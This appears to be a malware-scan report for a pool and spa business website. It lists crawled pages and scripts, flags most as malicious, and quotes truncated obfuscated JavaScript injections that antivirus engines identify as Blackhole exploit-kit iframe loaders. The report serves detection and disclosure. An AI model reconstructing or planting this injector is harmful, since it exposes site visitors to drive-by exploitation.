Request | Server response | Status |
http://www.absolutepoolspa.biz/ | 200 OK Content-Length: 22423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ycqmc="spl"+"i"+"t";zgtxwj=window;ytdbn="0"+"x";bzn=(5-3-1);try{--(document["body"])}catch(ntdiz){lqqgq=false;try{}catch(sgxmlj){lqqgq=21;}if(1){agy="17:5d:6c:65:5a:6b:60:66:65:17:6b:5d:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:5d:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:
... 3463 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6b:5d:6e:27:30:1f:20:32:4:1:74:4:1:74"[ycqmc](":");}zgtxwj=agy;rtf=[];for(wurtui=22-20-2;-wurtui+1404!=0;wurtui+=1){fqauq=wurtui;if((0x19==031))rtf+=String.fromCharCode(eval(ytdbn+zgtxwj[1*fqauq])+0xa-bzn);}vrfiz=eval;vrfiz(rtf)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1219
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- ViRobot
- JS.A.Agent.4463.D
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.absolutepoolspa.biz/rvsincludefile/rvsheadpage.js | 200 OK Content-Length: 1 Content-Type: application/javascript | clean |
http://www.absolutepoolspa.biz/rvsincludefile/rvsnavigator.js | 200 OK Content-Length: 6817 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ersrbs="spl"+"i"+"t";esotwo=window;laz="0"+"x";wiiyo=(5-3-1);try{--(document["body"])}catch(ssrz){nkve=false;try{}catch(wmfgt){nkve=21;}if(1){mae="17:5d:6c:65:5a:6b:60:66:65:17:68:63:60:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:63:60:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4
... 3509 bytes are skipped ...3:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:63:60:5a:27:30:1f:20:32:4:1:74:4:1:74"[ersrbs](":");}esotwo=mae;ivzqcv=[];for(trka=22-20-2;-trka+1419!=0;trka+=1){yfandw=trka;if((0x19==031))ivzqcv+=String.fromCharCode(eval(laz+esotwo[1*yfandw])+0xa-wiiyo);}junhc=eval;junhc(ivzqcv)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.absolutepoolspa.biz/js/publishNavigator/layersmenu-library.js | 200 OK Content-Length: 10832 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ersrbs="spl"+"i"+"t";esotwo=window;laz="0"+"x";wiiyo=(5-3-1);try{--(document["body"])}catch(ssrz){nkve=false;try{}catch(wmfgt){nkve=21;}if(1){mae="17:5d:6c:65:5a:6b:60:66:65:17:68:63:60:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:63:60:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4
... 3509 bytes are skipped ...3:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:63:60:5a:27:30:1f:20:32:4:1:74:4:1:74"[ersrbs](":");}esotwo=mae;ivzqcv=[];for(trka=22-20-2;-trka+1419!=0;trka+=1){yfandw=trka;if((0x19==031))ivzqcv+=String.fromCharCode(eval(laz+esotwo[1*yfandw])+0xa-wiiyo);}junhc=eval;junhc(ivzqcv)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.absolutepoolspa.biz/js/publishNavigator/layersmenu.js | 200 OK Content-Length: 11792 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ersrbs="spl"+"i"+"t";esotwo=window;laz="0"+"x";wiiyo=(5-3-1);try{--(document["body"])}catch(ssrz){nkve=false;try{}catch(wmfgt){nkve=21;}if(1){mae="17:5d:6c:65:5a:6b:60:66:65:17:68:63:60:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:63:60:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4
... 3509 bytes are skipped ...3:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:63:60:5a:27:30:1f:20:32:4:1:74:4:1:74"[ersrbs](":");}esotwo=mae;ivzqcv=[];for(trka=22-20-2;-trka+1419!=0;trka+=1){yfandw=trka;if((0x19==031))ivzqcv+=String.fromCharCode(eval(laz+esotwo[1*yfandw])+0xa-wiiyo);}junhc=eval;junhc(ivzqcv)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.absolutepoolspa.biz/rvsincludefile/rvscustomopenwindow.js | 200 OK Content-Length: 5831 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ersrbs="spl"+"i"+"t";esotwo=window;laz="0"+"x";wiiyo=(5-3-1);try{--(document["body"])}catch(ssrz){nkve=false;try{}catch(wmfgt){nkve=21;}if(1){mae="17:5d:6c:65:5a:6b:60:66:65:17:68:63:60:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:63:60:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4
... 3509 bytes are skipped ...3:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:63:60:5a:27:30:1f:20:32:4:1:74:4:1:74"[ersrbs](":");}esotwo=mae;ivzqcv=[];for(trka=22-20-2;-trka+1419!=0;trka+=1){yfandw=trka;if((0x19==031))ivzqcv+=String.fromCharCode(eval(laz+esotwo[1*yfandw])+0xa-wiiyo);}junhc=eval;junhc(ivzqcv)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.absolutepoolspa.biz/index.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.absolutepoolspa.biz/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.absolutepoolspa.biz/News--and--Events.php | 200 OK Content-Length: 25514 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ycqmc="spl"+"i"+"t";zgtxwj=window;ytdbn="0"+"x";bzn=(5-3-1);try{--(document["body"])}catch(ntdiz){lqqgq=false;try{}catch(sgxmlj){lqqgq=21;}if(1){agy="17:5d:6c:65:5a:6b:60:66:65:17:6b:5d:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:5d:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:
... 3463 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6b:5d:6e:27:30:1f:20:32:4:1:74:4:1:74"[ycqmc](":");}zgtxwj=agy;rtf=[];for(wurtui=22-20-2;-wurtui+1404!=0;wurtui+=1){fqauq=wurtui;if((0x19==031))rtf+=String.fromCharCode(eval(ytdbn+zgtxwj[1*fqauq])+0xa-bzn);}vrfiz=eval;vrfiz(rtf)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1219
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- ViRobot
- JS.A.Agent.4463.D
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.absolutepoolspa.biz/Catalogue.php | 200 OK Content-Length: 31099 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ycqmc="spl"+"i"+"t";zgtxwj=window;ytdbn="0"+"x";bzn=(5-3-1);try{--(document["body"])}catch(ntdiz){lqqgq=false;try{}catch(sgxmlj){lqqgq=21;}if(1){agy="17:5d:6c:65:5a:6b:60:66:65:17:6b:5d:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:5d:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:
... 3463 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6b:5d:6e:27:30:1f:20:32:4:1:74:4:1:74"[ycqmc](":");}zgtxwj=agy;rtf=[];for(wurtui=22-20-2;-wurtui+1404!=0;wurtui+=1){fqauq=wurtui;if((0x19==031))rtf+=String.fromCharCode(eval(ytdbn+zgtxwj[1*fqauq])+0xa-bzn);}vrfiz=eval;vrfiz(rtf)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1219
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- ViRobot
- JS.A.Agent.4463.D
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.absolutepoolspa.biz/Order.php | 200 OK Content-Length: 22564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ycqmc="spl"+"i"+"t";zgtxwj=window;ytdbn="0"+"x";bzn=(5-3-1);try{--(document["body"])}catch(ntdiz){lqqgq=false;try{}catch(sgxmlj){lqqgq=21;}if(1){agy="17:5d:6c:65:5a:6b:60:66:65:17:6b:5d:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:5d:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:
... 3463 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6b:5d:6e:27:30:1f:20:32:4:1:74:4:1:74"[ycqmc](":");}zgtxwj=agy;rtf=[];for(wurtui=22-20-2;-wurtui+1404!=0;wurtui+=1){fqauq=wurtui;if((0x19==031))rtf+=String.fromCharCode(eval(ytdbn+zgtxwj[1*fqauq])+0xa-bzn);}vrfiz=eval;vrfiz(rtf)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1219
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- ViRobot
- JS.A.Agent.4463.D
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.absolutepoolspa.biz/Online-Form.php | 200 OK Content-Length: 30769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ycqmc="spl"+"i"+"t";zgtxwj=window;ytdbn="0"+"x";bzn=(5-3-1);try{--(document["body"])}catch(ntdiz){lqqgq=false;try{}catch(sgxmlj){lqqgq=21;}if(1){agy="17:5d:6c:65:5a:6b:60:66:65:17:6b:5d:6e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:5d:6e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:
... 3463 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6b:5d:6e:27:30:1f:20:32:4:1:74:4:1:74"[ycqmc](":");}zgtxwj=agy;rtf=[];for(wurtui=22-20-2;-wurtui+1404!=0;wurtui+=1){fqauq=wurtui;if((0x19==031))rtf+=String.fromCharCode(eval(ytdbn+zgtxwj[1*fqauq])+0xa-bzn);}vrfiz=eval;vrfiz(rtf)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1219
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- ViRobot
- JS.A.Agent.4463.D
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://www.absolutepoolspa.biz/js/form.js?v2.0. | 200 OK Content-Length: 29195 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ersrbs="spl"+"i"+"t";esotwo=window;laz="0"+"x";wiiyo=(5-3-1);try{--(document["body"])}catch(ssrz){nkve=false;try{}catch(wmfgt){nkve=21;}if(1){mae="17:5d:6c:65:5a:6b:60:66:65:17:68:63:60:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:68:63:60:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4
... 3509 bytes are skipped ...3:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:68:63:60:5a:27:30:1f:20:32:4:1:74:4:1:74"[ersrbs](":");}esotwo=mae;ivzqcv=[];for(trka=22-20-2;-trka+1419!=0;trka+=1){yfandw=trka;if((0x19==031))ivzqcv+=String.fromCharCode(eval(laz+esotwo[1*yfandw])+0xa-wiiyo);}junhc=eval;junhc(ivzqcv)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://www.absolutepoolspa.biz/captcha.php | 200 OK Content-Length: 2076 Content-Type: text/html | clean |
